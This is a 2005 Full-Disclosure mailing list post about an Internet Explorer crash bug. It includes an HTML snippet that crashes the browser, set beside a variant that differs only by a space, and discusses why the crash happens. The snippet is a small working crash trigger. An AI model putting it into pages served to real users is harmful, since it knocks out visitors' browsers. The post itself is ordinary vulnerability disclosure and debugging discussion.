[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <4367A9FD.3010202@gnucitizen.org>
Date: Tue Nov 1 17:47:00 2005
From: ppetkov at gnucitizen.org (Petko Petkov)
Subject: new IE bug (confirmed on ALL windows)
It is definitely a margin/padding problem. For example the following
code will crash it:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<STYLE>
.supp IMG {
VERTICAL-ALIGN: middle
}
</STYLE>
<P><A <It>.</P>
<DIV class="supp"> <A><IMG>
While this wont:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<STYLE>
.supp IMG {
VERTICAL-ALIGN: middle
}
</STYLE>
<P><A <It>.</P>
<DIV class="supp"><A><IMG>
It seams that the space makes a difference.
Peter Ferrie wrote:
>>I think I have found by chance this weekend a security bug,while browsing
>>the website news, within iexplorer on all windows versions.
>>I haven't enough knowledge (and don't want) into web browsers security to
>>conduct a full investigation, at least
>>
>>
>
>Just the ".supp IMG" is enough to trigger it.
>It looks like a property list with one entry too many.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
Powered by blists - more mailing lists